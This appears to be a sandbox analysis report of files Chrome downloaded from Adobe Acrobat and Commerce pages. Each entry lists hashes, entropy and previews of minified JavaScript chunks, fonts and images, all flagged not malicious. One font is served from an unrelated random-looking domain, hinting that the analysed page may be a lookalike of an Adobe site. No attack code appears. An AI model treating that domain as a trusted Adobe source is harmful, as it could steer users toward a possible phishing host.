                  Preview:(self["webpackJsonp-global-nav"]=self["webpackJsonp-global-nav"]||[]).push([[452],{FgNL:(e,t,a)=>{"use strict";t.g=function A4uBeaker(e){var t=_extends({},e);return n.default.createElement("svg",_extends({viewBox:"0 0 36 36"},t,t),n.default.createElement("path",{fillRule:"evenodd",d:"M33.072,31.759,24,14V4h1a1,1,0,0,0,1-1V1a1,1,0,0,0-1-1H11a1,1,0,0,0-1,1V3a1,1,0,0,0,1,1h1V14L2.928,31.759A3,3,0,0,0,5.659,36H30.341A3,3,0,0,0,33.072,31.759ZM8.727,24.364,14,14.454V4h8V14.455l2.636,4.909Z"}))};var n=function _interopRequireDefault(e){return e&&e.__esModule?e:{default:e}}(a("YWiy"));function _extends(){return _extends=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var a=arguments[t];for(var n in a)Object.prototype.hasOwnProperty.call(a,n)&&(e[n]=a[n])}return e},_extends.apply(this,arguments)}},e4dh:(e,t,a)=>{"use strict";t.i=function A4uChevronDown(e){var t=_extends({},e);return n.default.createElement("svg",_extends({viewBox:"0 0 36 36"},t,t),n.default.cr
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (421), with no line terminators
                  Category:downloaded
                  Size (bytes):421
                  Entropy (8bit):5.390233769570096
                  Encrypted:false
                  SSDEEP:
                  MD5:A8E56BA75BB78B55BB3FDB583DC7B7C9
                  SHA1:4DACF0990CFB1FA69AA8DAEF23C1C51B503FC493
                  SHA-256:FF612D8C7A889CA50D6D8C16808F04A5CF9A0B85545A71D3F0AF9750373FDA12
                  SHA-512:8A74146859503C0298FA082A167BCCAC2F072999668FC12C5ED5574306878D4FC67D3608FFF7DA04322413637AC735B3490505A8F62ADCEC8BB61F34679FC017
                  Malicious:false
                  Reputation:unknown
                  URL:https://commerce.adobe.com/mini-apps/_next/static/chunks/pages/paywall-ed50ba749df208f49488.js
                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1871],{37201:function(n,u,_){"use strict";_.r(u);var t=_(36852),r=_(9567);u.default=(0,r.r9)(t)},27114:function(n,u,_){(window.__NEXT_P=window.__NEXT_P||[]).push(["/paywall",function(){return _(37201)}])},56989:function(){}},function(n){n.O(0,[532,6316,4558,5393,3612,4683,241,6852,9774,2888,179],(function(){return u=27114,n(n.s=u);var u}));var u=n.O();_N_E=u}]);
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (4579)
                  Category:downloaded
                  Size (bytes):4646
                  Entropy (8bit):5.141919226365306
                  Encrypted:false
                  SSDEEP:
                  MD5:491BF990A181A06203C9B65DF764817D
                  SHA1:8A3176DFC1C2904F1C77F91C7D7AB1006FC1324C
                  SHA-256:B1CA101DE4ECCEEA3229D11DF0B0E34C47E36B5BAC95661F3910AF4507D1F83E
                  SHA-512:36D78380B0F8EDF6599E713F4BD82F4B2FFC96AF98F9C66624A7ADA96FC1F78A1B31F42C1EC700EB3C6058934A39202114F33B88F706DB2192A3374CDFE501A0
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dcpreviewdropin/3.46.1_2.1134.0/keyboardshortcutprovider-chunk.js
                  Preview:"use strict";(self["webpackJsonp-preview"]=self["webpackJsonp-preview"]||[]).push([[1634],{HMU2:(t,r,s)=>{s.r(r),s.d(r,{default:()=>KeyboardShortcutsProvider});class KeyboardShortcut{constructor(t,r,s){this.id=void 0,this.shortcutExprs=void 0,this.handler=void 0,this.id=t,this.shortcutExprs=r,this.handler=s}}var e=s("plsW"),o=s("WLLa"),h=s("vPEr");const getFormattedShortcutExpr=t=>{let r="";return t.altKey&&(r+="alt_"),t.ctrlKey&&(r+="ctrl_"),t.metaKey&&(r+="meta_"),t.shiftKey&&(r+="shift_"),`${r}${sanitiseEventCode(t.code.toLowerCase())}`},formatShortcutExpr=t=>{const r=t.toLowerCase().split("+").map(sanitiseModifierKeys).sort(),s=r.filter(isModifier).join("_"),e=r.filter((t=>!isModifier(t))).pop();return s?e?`${s}_${e}`:null:e},getDisplayLabel=t=>{const r=sanitiseModifierKeys(t.toLowerCase());return o.jx[r]?o.jx[r]:t},sanitiseEventCode=t=>{let r=t;for(const t of o.PA)r=r.replace(t,"");return r},sanitiseModifierKeys=t=>"command"===t||"cmd"===t?"meta":"control"===t?"ctrl":t,isModifier=
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (65363)
                  Category:downloaded
                  Size (bytes):335812
                  Entropy (8bit):5.996341755271696
                  Encrypted:false
                  SSDEEP:
                  MD5:E8B92B99EE0A93576E12063A996775E3
                  SHA1:DA49E2DF35017AE63B07126A09C1C24775C18A23
                  SHA-256:2824C3509FC4CCF1B3F72D09D9EF3BBE8D4786FF37C85C9E5DF294FA30E783DD
                  SHA-512:0544F59D8B4F4E2BAEAFF9E3AFF6623E69B670D828AEB67534C5AEFE90A565F77290A4A9EA579CB4D3E2A4F999B5ED6CDF9B22CA4B010B68E2D8B9B6E370A0F5
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-ccverbs-dropin/3.17.1_2.303.0/bootstrap.js
                  Preview:/*! For license information please see bootstrap.js.LICENSE.txt */.(()=>{var e,t,r,o,i={R03Y:(e,t,r)=>{"use strict";t.y=function A4uLinkOut(e){var t=_extends({},e);return o.default.createElement("svg",_extends({viewBox:"0 0 36 36"},t,t),o.default.createElement("path",{fillRule:"evenodd",d:"M33,18H31a1,1,0,0,0-1,1V30H6V6H17a1,1,0,0,0,1-1V3a1,1,0,0,0-1-1H3A1,1,0,0,0,2,3V33a1,1,0,0,0,1,1H33a1,1,0,0,0,1-1V19A1,1,0,0,0,33,18Z"}),o.default.createElement("path",{fillRule:"evenodd",d:"M33.5,2H22.754A.8.8,0,0,0,22,2.8a.784.784,0,0,0,.235.56L26.021,7.15l-7.042,7.042a1,1,0,0,0,0,1.415l1.414,1.414a1,1,0,0,0,1.414,0L28.85,9.979l3.786,3.785A.781.781,0,0,0,33.2,14a.8.8,0,0,0,.8-.754V2.5A.5.5,0,0,0,33.5,2Z"}))};var o=function _interopRequireDefault(e){return e&&e.__esModule?e:{default:e}}(r("YWiy"));function _extends(){return _extends=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var o in r)Object.prototype.hasOwnProperty.call(r,o)&&(e[o]=r[o
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:
                  MD5:CFCD208495D565EF66E7DFF9F98764DA
                  SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                  SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                  SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                  Malicious:false
                  Reputation:unknown
                  Preview:0
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Web Open Font Format (Version 2), TrueType, length 28000, version 1.66
                  Category:downloaded
                  Size (bytes):28000
                  Entropy (8bit):7.99335735457429
                  Encrypted:true
                  SSDEEP:
                  MD5:A4BCA6C95FED0D0C5CC46CF07710DCEC
                  SHA1:73B56E33B82B42921DB8702A33EFD0F2B2EC9794
                  SHA-256:5A51D246AF54D903F67F07F2BD820CE77736F8D08C5F1602DB07469D96DBF77F
                  SHA-512:60A058B20FCB4F63D02E89225A49226CCD7758C21D9162D1B2F4B53BBA951B1C51D3D74C562029F417D97F1FCA93F25FDD2BC0501F215E3C1EF076810B54DD06
                  Malicious:false
                  Reputation:unknown
                  URL:https://4fsv.iatrivvbe.com/GDSherpa-bold.woff2
                  Preview:wOF2......m`......$...l....B.......................6....`..<.<..b.....$....6.$..x..>.. .....{...[..q.k.]]O....s...|..n...!..[<;....P&..g....!..I'i..Q.DP....9..J......9G..Q1(..)Jn......8Y......)J.F.c A..7k.v...2=.Z.n.4`...~Nl...4;...S.l{w..:.#..=!. ..X....>[.7........1??.3.?t..qE..f...b...,.Fwcp8...4^.^x..|....Ro<%.."....~0..q..rP..G.......R....-..{O.QeJ.....6.E........{.{.....,h.!.._......$..3..cF@..>........t.o...Fc ...YS.....s.V..j....uk.`n......#....6.....1`kbd..Z..).x...F........T.._..}...p..._F.0.S'.V.g........3.$...Jf.j._,J....v7(...(..bm.....a....Nh.(QS.H...5.w.o.1.[<m.1.cJ......B......R..L..>[|@..]../...6.\..(.j.Bn...Oj.&/j@.'T...w.,...*...e.g.I=.w.x..ap..?.......lI../..uuDH.P.....)._...<..C.x.......Kh.P.|"M..JQ......?`..S@{..o..RjCE.qx.p.!(Wi....dY.%./r.#.p..C ..........r.o4P.}...3X..].....6.'~&...]...*y...YQ..9."v....3...oEMQoWM.W`................Y.V..O2......l....p.1..B..Fn..o.<..,C......^.Y.C...W..tX..|.`...5:.Yd@]..j..$...v.
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (11550)
                  Category:downloaded
                  Size (bytes):11597
                  Entropy (8bit):5.435574934580372
                  Encrypted:false
                  SSDEEP:
                  MD5:2658EA519EE3AFA596203CEE718E4920
                  SHA1:91519CE808A10E3CDABDD780A952DE27E47C3633
                  SHA-256:1A18FA5C6EA3FF933459EBF8716625738D0A0ADB52807C8979BB7AFA19455429
                  SHA-512:EA0F31B8A8D5C893FB5081908DE98F0258D914F4F8CC33F18ED725A58A20A4738E03B4EA28BB9AF8721C0EAAB8729B0E748DB6687750342E962C8DD0B6939E32
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-home2-dropin/3.52.0_2.1349.0/3209-chunk.js
                  Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},o=(new e.Error).stack;o&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[o]="6065e459-8d00-4b87-968a-ad9946defff8",e._sentryDebugIdIdentifier="sentry-dbid-6065e459-8d00-4b87-968a-ad9946defff8")}catch(e){}}();var _global="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};_global.SENTRY_RELEASE={id:"939110932eed36816ac9d538606bc3479c9c8233"},(self["webpackJsonp-home2"]=self["webpackJsonp-home2"]||[]).push([[3209],{"/Ld9":(e,o,t)=>{"use strict";t.d(o,{D3:()=>isChromeViewerOrEmbedViewer,Dl:()=>getExtensionOpenLink,F7:()=>getIsExtensionInstalled,XD:()=>getExtensionDownloadLink,ar:()=>shouldScrollIntoViewport,dC:()=>isDeviceMobileOrTablet,fS:()=>getDownloadExtensionQueryParams,i7:()=>isChrome,qs:()=>getBrowser,un:()=>isEdge});var r=t("plsW");const isChrome=async()=>{const e=await r.providers.device();if(e.userA
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (50763)
                  Category:downloaded
                  Size (bytes):50836
                  Entropy (8bit):5.72980585085375
                  Encrypted:false
                  SSDEEP:
                  MD5:0AC85D17F6DF20D9C47066619DE12658
                  SHA1:12423340C07E883278DD55BC086E3DF62E54043F
                  SHA-256:1190E20EAC0348CD0354068D956F5FC9637AFC1834E42CC805FC33A9C81926F6
                  SHA-512:C1B2620F43979BE3BAF76B65EB95FCD766A73799B4EC6ABE32B341E295D4F60458D0212E3DC57EB190C54C7C87FE82C73F6A283AABED35B63DF1595A9D561609
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-comments-dropin/3.59.4_2.1115.1/commentingVerbs-chunk.js
                  Preview:(self["webpackJsonp-comments"]=self["webpackJsonp-comments"]||[]).push([[8632],{SV1a:(e,t,n)=>{"use strict";n.r(t),n.d(t,{default:()=>CommentTextBoxVerb});var o=n("D/Yr"),i=n("cfWR"),r=n("7I0s"),l=n("pUtt"),s=n("iaHC"),c=n("YY8+");class CommentTextBoxVerb{static getInstance(){return CommentTextBoxVerb._instance||(CommentTextBoxVerb._instance=new CommentTextBoxVerb),CommentTextBoxVerb._instance}exitCallback(){c.A.resetSelectedTool()}initializeAction(){let e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:{};(0,l.default)(e)}getPlacement(){return o.A.CONTEXT_MENU_PLACEMENT_PRE_HEADER}executeAction(){let e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:{};const t=s.A.commentTextBoxObject,n=Object.assign(Object.assign({},e),{textValue:t.textValue}),l=t.contextMenuPosition;if(e.triggerType===o.A.RIGHT_CLICK&&(e.clickPoint.x!==l.left||e.clickPoint.y!==l.top)){const n=Object.assign(Object.assign({},t),{contextMenuPosition:{left:e.clickPoint.x,top:e.clickPoint.y}});s.A.setCommen
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (37758), with no line terminators
                  Category:downloaded
                  Size (bytes):37760
                  Entropy (8bit):4.758151689738063
                  Encrypted:false
                  SSDEEP:
                  MD5:02545D9EF371B5D55CD4CF16BA6EEA1C
                  SHA1:45674A57F25CDEC540541421666990C8163C96A1
                  SHA-256:8D105F873F19327613D33FEBD74103D3699A7D6F34D00B9A83BAA8A422364201
                  SHA-512:1AAE3FFFAD4FA4C63448E48F735283A7F687ECD076B4553132FB4704BCC754742BDE3140D1DFF0BC5CD52FBC50316EEA7D281E81FFE5D0407BEF490B9BD61B50
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-sign-dropin/3.22.0_3.427.0/translations-[request]-chunk.js
                  Preview:"use strict";(self["webpackJsonp-sign"]=self["webpackJsonp-sign"]||[]).push([[3023],{t39f:e=>{e.exports=JSON.parse('{"agreement_already_expired.APPROVER":"This document has expired and can no longer be approved.","agreement_already_expired.SIGNER":"This document has expired and can no longer be signed.","agreement_already_expired.DELEGATE_TO_SIGNER":"This document has expired and can no longer be signed.","agreement_already_expired.DELEGATE_TO_APPROVER":"This document has expired and can no longer be approved.","agreement_already_expired.ACCEPTOR":"This document has expired and can no longer be accepted.","agreement_already_expired.CERTIFIED_RECIPIENT":"This document has expired and its receipt can no longer be acknowledged.","agreement_already_expired.FORM_FILLER":"This document has expired and can no longer be filled.","agreement_already_expired.DELEGATE_TO_ACCEPTOR":"This document has expired and can no longer be accepted.","agreement_already_expired.DELEGATE_TO_CERTIFIED_RECIPIENT"
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (13155)
                  Category:downloaded
                  Size (bytes):13211
                  Entropy (8bit):4.596255827486776
                  Encrypted:false
                  SSDEEP:
                  MD5:19372147F7DC98C5672A73186A065157
                  SHA1:D07C8B97F93AE3ED7105F5E5D26E489B38B724BB
                  SHA-256:9C1D03EB0D2D7101FDF8168DB35B45042C7D971D6ABF95D4811B1109BF89D3FB
                  SHA-512:CCC54DD9DD43AB486B60BFB36EEBC77F06B3D7442D5D323AA8DB2E9D0C8FED6FAAA58B34262190E113EDFF7618001CCAE14E711C031A003E3E2FC486D2F0EC13
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-organize-verbs-dropin/3.17.1_2.683.0/context-board-icons.js
                  Preview:(self["webpackJsonp-organize-verbs"]=self["webpackJsonp-organize-verbs"]||[]).push([[9487],{VQtK:(e,l,i)=>{var C=i("YWiy");function A12CombineFiles24(e){return C.createElement("svg",e,C.createElement("g",{id:"A12_Combine-files_24",stroke:"none",strokeWidth:"1",fill:"none",fillRule:"evenodd"},[C.createElement("path",{d:"M8.86439344,2 C9.34743906,2 9.8127946,2.17163532 10.1807606,2.48125018 L10.3140271,2.60375781 L12,4.297 L12,3.93077245 C12,2.92512301 12.7188086,2.08372878 13.6541534,2.00587639 L13.7960164,2 L20.1673607,2 C20.6284441,2 21.0700722,2.17762471 21.4157751,2.49445869 L21.5407679,2.61972184 L23.4481146,4.70995246 C23.7635068,5.05562449 23.9542594,5.50692916 23.9927551,5.98413063 L24,6.16413936 L24,16.0690284 C24,17.074696 23.2811816,17.9162544 22.3458452,17.9941224 L22.2039836,18 L14.25,18 L14.25,17 L22.2039836,17 C22.5989899,17 22.9430163,16.653699 22.9936061,16.18785 L23,16.0690284 L23,7 L19.5,7 C19.2545401,7 19.0503916,6.82312484 19.0080557,6.58987563 L19,6.5 L19,3 L13.796
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:PNG image data, 420 x 94, 8-bit/color RGBA, non-interlaced
                  Category:downloaded
                  Size (bytes):10796
                  Entropy (8bit):7.946024875001343
                  Encrypted:false
                  SSDEEP:
                  MD5:12BDACC832185D0367ECC23FD24C86CE
                  SHA1:4422F316EB4D8C8D160312BB695FD1D944CBFF12
                  SHA-256:877AE491D9AAC5C6EF82A8430F9F652ACE8A0DBC7294BD112AAD49BD593769D0
                  SHA-512:36C319AC7F75202190E7A59F3F3C92892A71D5F17663E672319A745B6574BCFDE7C89B35F480CB15A193924DACB9D67F8CA1E1BC2BF33FC5CCBFA152CC7BA2D0
                  Malicious:false
                  Reputation:unknown
                  URL:https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7
                  Preview:.PNG........IHDR.......^.....l2`...).IDATx..}...U.... w...B..P$.Hv..t......x.EA@.Q`.E......-.".(..X`..D....5]]U}....$3...&...guOw..}>.....~....w.ZZ...z..FZ$I.$I....N.......tt.$e...M....ru$I.$IR.h.AvK0.t..wy.:.1...D.H...LS....iF~.X...smr.$I.$IR.4.....SY..@....h8.....*..dB...1.eG...$I.$.hZ...8.r...[.A.I..XE..hdA{Z..teaF...u:}.1^..-I.$I.FP.A..Nm..........A78...=.%W_.$I..8YQ.H2z#.D_...m..k..u.t..R6#.....N....){...$I..1@...g...@a ..u2..dL...*ai.d.[.$I..D.....OM..a...,h%u.B.....0...57..hrW..$I....Gf.|.=.eg`.........k.J.$IR..<.u....]....@.d...H..$I.$5..MWwu:....H|Y..,.$.I.$I....Qu...s.NzzM..]..;$ I.$IR......+..L9......63.I@.$I..z..#.....:..7...s..<$ I.$I.hP.tu...m"..o1.y.@..W1T<(..... z%."?.4zE..$ ..Y1z`.P..!....`t%t....[..d...N.UKy&.A;..6S...<...........o...]0...r.$I......0..R.....N.....0Wi._.;...M..Lrb{.7w..].jm.r....C...&..gd}..Etm}..~L.l...}n\'...$..Mr.i..{..n..9.....SwMh.}.Q{./wJ.....B]:.....+..\V...A.S.w..6.....,..[.......J@....-.4.....:..Zvt.r.*.
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text
                  Category:downloaded
                  Size (bytes):481
                  Entropy (8bit):3.998674361882104
                  Encrypted:false
                  SSDEEP:
                  MD5:03DB7A20C614CC6FE830EDD353B44904
                  SHA1:A0883E893D819D325B9DFDA19F84D98C74BB90B6
                  SHA-256:CFC32A2207E7DCE665E2A6C8CE5C8AE5E3C83AA2BB2184277CE2F39E6838D597
                  SHA-512:23E262252347A3C4F1F8F3BEE31A9024BDAA60D23BE18C494305C3014F7B36F2E9F0C22CAD578C235BA7D1940AC1157B46957372897CAF9FE32975CEB5B8A593
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-kill-switch-overrides/killSwitchOverrides.js
                  Preview:(function initKillSwitchOverrides() {. window.dcKillSwitchOverrides = {. "dev": {. "dc-view-sdk-bundle": {. javaScriptEnabledVersion: "2.5.4",. },. },. "stage": {. "dc-view-sdk-bundle": {. javaScriptEnabledVersion: "2.5.4",. },. },. "prod": {. "dc-view-sdk-bundle": {. javaScriptEnabledVersion: "2.5.8",. },. },. };.}());.
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65536), with no line terminators
                  Category:downloaded
                  Size (bytes):150369
                  Entropy (8bit):5.290436649341434
                  Encrypted:false
                  SSDEEP:
                  MD5:162D72BD1F47E8B04C989FC88B0C150B
                  SHA1:F62924F62E5ABC66FC6400A814320D4F0ACC0E4B
                  SHA-256:4ACA2FFF751EF2B9647B07B62D61468789BB56B42ED967E3351731EFAB4981F7
                  SHA-512:DB0879D67E09B8B42AC5D5FE01EEF0A69EB7CF293E9EAF997887F25DAE50A7CFA5A842CFB8E9B931F3DFF17C376F6AE7C7B057DCEE74BFF4A99C3EB7DBF1EAE7
                  Malicious:false
                  Reputation:unknown
                  URL:https://commerce.adobe.com/mini-apps/_next/static/chunks/framework-cd385e6e308f280c00f4.js
                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9774],{92703:function(e,t,n){"use strict";var r=n(50414);function l(){}function i(){}i.resetWarningCache=l,e.exports=function(){function e(e,t,n,l,i,o){if(o!==r){var a=new Error("Calling PropTypes validators directly is not supported by the `prop-types` package. Use PropTypes.checkPropTypes() to call them. Read more at http://fb.me/use-check-prop-types");throw a.name="Invariant Violation",a}}function t(){return e}e.isRequired=e;var n={array:e,bigint:e,bool:e,func:e,number:e,object:e,string:e,symbol:e,any:e,arrayOf:t,element:e,elementType:e,instanceOf:t,node:e,objectOf:t,oneOf:t,oneOfType:t,shape:t,exact:t,checkPropTypes:i,resetWarningCache:l};return n.PropTypes=n,n}},45697:function(e,t,n){e.exports=n(92703)()},50414:function(e){"use strict";e.exports="SECRET_DO_NOT_PASS_THIS_OR_YOU_WILL_BE_FIRED"},38698:function(e,t,n){"use strict";var r=n(96086),l=n(67294);function i(e){for(var t="https://reactjs.org/docs/error-decoder.html?inva
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (3290)
                  Category:downloaded
                  Size (bytes):3338
                  Entropy (8bit):5.124717548047286
                  Encrypted:false
                  SSDEEP:
                  MD5:AFBECDDFAA7F93F4D9A8F4DC21C9ACB6
                  SHA1:110F0290A61D09CC3F5B3171AE4CB716404C0EFC
                  SHA-256:66D1068845E1DA3F2EAD24C1C531E0D169A09BB8BBB1603A1FCC62AA56AB1FB0
                  SHA-512:C60E01B233637C2DC8FBED9612C0063D81FAFC21CDD5B81BD94607A0627BDFBCEA5C956A927D19409F59DAC64B55684E8938A0A54D4124D31AB63B445CDDC91C
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-organize-verbs-dropin/3.17.1_2.683.0/18-18-icons.js
                  Preview:(self["webpackJsonp-organize-verbs"]=self["webpackJsonp-organize-verbs"]||[]).push([[7070],{JKe3:(e,a,t)=>{var l=t("YWiy");function SRotatePages24N(e){return l.createElement("svg",e,[l.createElement("polygon",{points:"14.58932 8.032 11.99332 8.032 11.99332 5.392 14.58932 8.032",fill:"var(--iconChartreuse, #87b103)",fillRule:"evenodd",isolation:"isolate",opacity:".1",key:0}),l.createElement("path",{d:"M1.99332,5H9.99332v3c0,1.1,.9,2,2,2h3v12H1.99332V5Z",fill:"var(--iconChartreuse, #87b103)",fillRule:"evenodd",isolation:"isolate",opacity:".1",key:1}),l.createElement("path",{d:"M15.57996,6.23999l-2.59216-2.37415c-.77002-.78003-.88782-.86584-1.98779-.86584H2C.89996,3,0,3.89996,0,5V22c0,1.09998,.89996,2,2,2H15c1.09998,0,2-.90002,2-2V8.64996c-.01001-1.09998-.64001-1.63-1.42004-2.40997Zm-3.57996-.82001l2.57996,2.58002h-2.57996v-2.58002Zm3,16.58002H2V5H10v3c0,1.09998,.89996,2,2,2h3v12Z",fill:"var(--iconChartreuse, #87b103)",key:2}),l.createElement("path",{d:"M23.9093,8.13037c-.05969-.06329-.14
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65536), with no line terminators
                  Category:downloaded
                  Size (bytes):1641009
                  Entropy (8bit):5.604509919794576
                  Encrypted:false
                  SSDEEP:
                  MD5:5053CE99618C3269C2F0E86DB602115D
                  SHA1:328792034A56CA8C8D4C038DDF03D0AA1E5B22F5
                  SHA-256:BF3ED2D9EEECBC8C1E6537487EECE060EF92059EE1C71BACBA8F99DF321C20D7
                  SHA-512:3918CC404096EEEAB0E4A6A204E3B3A30732CFCCB4D0D370175E12ABAF1620757206F511EF2A96DFC27ECD33BA89552615A559B61BF414899B35086812FE0260
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-marketing/3.67.0_2.863.0/bootstrap.js
                  Preview:(()=>{var e,t,i,r,n={XpBI:function(e,t,i){"use strict";var r=this&&this.__createBinding||(Object.create?function(e,t,i,r){void 0===r&&(r=i);var n=Object.getOwnPropertyDescriptor(t,i);n&&!("get"in n?!t.__esModule:n.writable||n.configurable)||(n={enumerable:!0,get:function(){return t[i]}}),Object.defineProperty(e,r,n)}:function(e,t,i,r){void 0===r&&(r=i),e[r]=t[i]}),n=this&&this.__setModuleDefault||(Object.create?function(e,t){Object.defineProperty(e,"default",{enumerable:!0,value:t})}:function(e,t){e.default=t}),a=this&&this.__importStar||function(e){if(e&&e.__esModule)return e;var t={};if(null!=e)for(var i in e)"default"!==i&&Object.prototype.hasOwnProperty.call(e,i)&&r(t,e,i);return n(t,e),t},l=this&&this.__awaiter||function(e,t,i,r){return new(i||(i=Promise))((function(n,a){function fulfilled(e){try{step(r.next(e))}catch(e){a(e)}}function rejected(e){try{step(r.throw(e))}catch(e){a(e)}}function step(e){e.done?n(e.value):function adopt(e){return e instanceof i?e:new i((function(t){t(e
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65536), with no line terminators
                  Category:downloaded
                  Size (bytes):486451
                  Entropy (8bit):5.4715681661895585
                  Encrypted:false
                  SSDEEP:
                  MD5:175259A556C7F8F0BA3A577AEEA5CE16
                  SHA1:E149F11D7E8111F9BA77578ADE4CBB3D67B1F4A7
                  SHA-256:6114CBF8FF4E5669FD78AEE0E3C9DB01782E4256D939DF7A3B2715D8BA3B9CF8
                  SHA-512:D3ACD5096288CE84E3D2F18175F4911F803FB5B14E34FC1653367A4E2AE50C72731E3FFBEC504BF77A12864FAACB8C9BDC0C1F2B2EBD49F9CB0692003F9629ED
                  Malicious:false
                  Reputation:unknown
                  URL:https://commerce.adobe.com/store/_next/static/chunks/pages/commitment-3cc0a445cbd83f43.js
                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[469],{899174:function(e,t,n){"use strict";e.exports=n(939667)},939667:function(e,t,n){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var r=function(e){if(e&&e.__esModule)return e;var t={};if(null!=e)for(var n in e)if(Object.prototype.hasOwnProperty.call(e,n)){var r=Object.defineProperty&&Object.getOwnPropertyDescriptor?Object.getOwnPropertyDescriptor(e,n):{};r.get||r.set?Object.defineProperty(t,n,r):t[n]=e[n]}return t.default=e,t}(n(667294));n(282790);var o,a=(o=n(45697))&&o.__esModule?o:{default:o},i=n(744959);function l(e){return l="function"===typeof Symbol&&"symbol"===typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"===typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},l(e)}function c(){return c=Object.assign||function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var r in n)Object.prototype.hasOwnProperty.call(n,r)&
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Web Open Font Format (Version 2), CFF, length 29864, version 1.0
                  Category:downloaded
                  Size (bytes):29864
                  Entropy (8bit):7.99160407760851
                  Encrypted:true
                  SSDEEP:
                  MD5:4452DC6297BDBE982C9F628872167542
                  SHA1:4F25BEF02FC35DBA5CAECEF2CCAFB273F84E511A
                  SHA-256:60E5F1638FB7BF5D5234A522465F951BCBA2275B68EFDE8916A049F55E782C91
                  SHA-512:F3F6473973105867D8BC1399E624B37E562E48A3E8770F83914D5AA16A0C2013810A5750C406AEB59C517A240D20C88FE37F5DDB72FCAAA41A3626B11AEC53A5
                  Malicious:false
                  Reputation:unknown
                  URL:https://use.typekit.net/af/c0160f/00000000000000007735dac8/30/l?primer=7fa3915bdafdf03041871920a205bef951d72bf64dd4c4460fb992e3ecc3a862&fvd=n4&v=3
                  Preview:wOF2OTTO..t...........tN.........................F....?DYNA.p?GDYN.y..r.`..,.6.$..L...... .....H........Q.............U...~..?../..........w.s&...\.n..anwv7...&....*r...u..Sc..H#9.....k...[7.....L.%..P\..J/..@....``..D^.....{..w.I...=.kii..c.....P..r[n.a+.E.b....hb.M....fo0.....[J..?(Z.$A..&.:.c.&ig..Y...Y..9+.i.$......qf...C..0a..LL.....R29.....]_.\...a.0....3...K.$'...C..V..E...DZ......< ......Z......M....O.?...oW.....N..R.s;.[x&p..b..`.TqG....R.......5p......V<{R.9..d.3...p.wN..J.4{R.V<+9..k.*.J*.L...].;..STU|.i).y.....,...`k'..1....I_se..iwJ..*..Ra..Ja...\JE.....n...Bp^..k..e..rK.c`..x..g.F....P!e2.U...0....W....!j....$.<.}.....E'....C0..a.....A.h.....+. ...d.... .ul..3\....y>..x.....0...x'.1[.....?......~NZ......'.M]...O....F.$...`...j......Z.g.[{..[.v..M...p....>..5..U..56R.|..HK..\R......%..i..H....JW..rJ\4>.Pwd|I.MM.{..$....Z.O....s&...S..c..2.W.R..b.[$.Q_Bc.o.y`4v.=.65..H.......K......fSA....&.E:. . &..ZO.a:..>..d.. ...o.".>....
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Web Open Font Format (Version 2), CFF, length 29924, version 1.0
                  Category:downloaded
                  Size (bytes):29924
                  Entropy (8bit):7.990245820751983
                  Encrypted:true
                  SSDEEP:
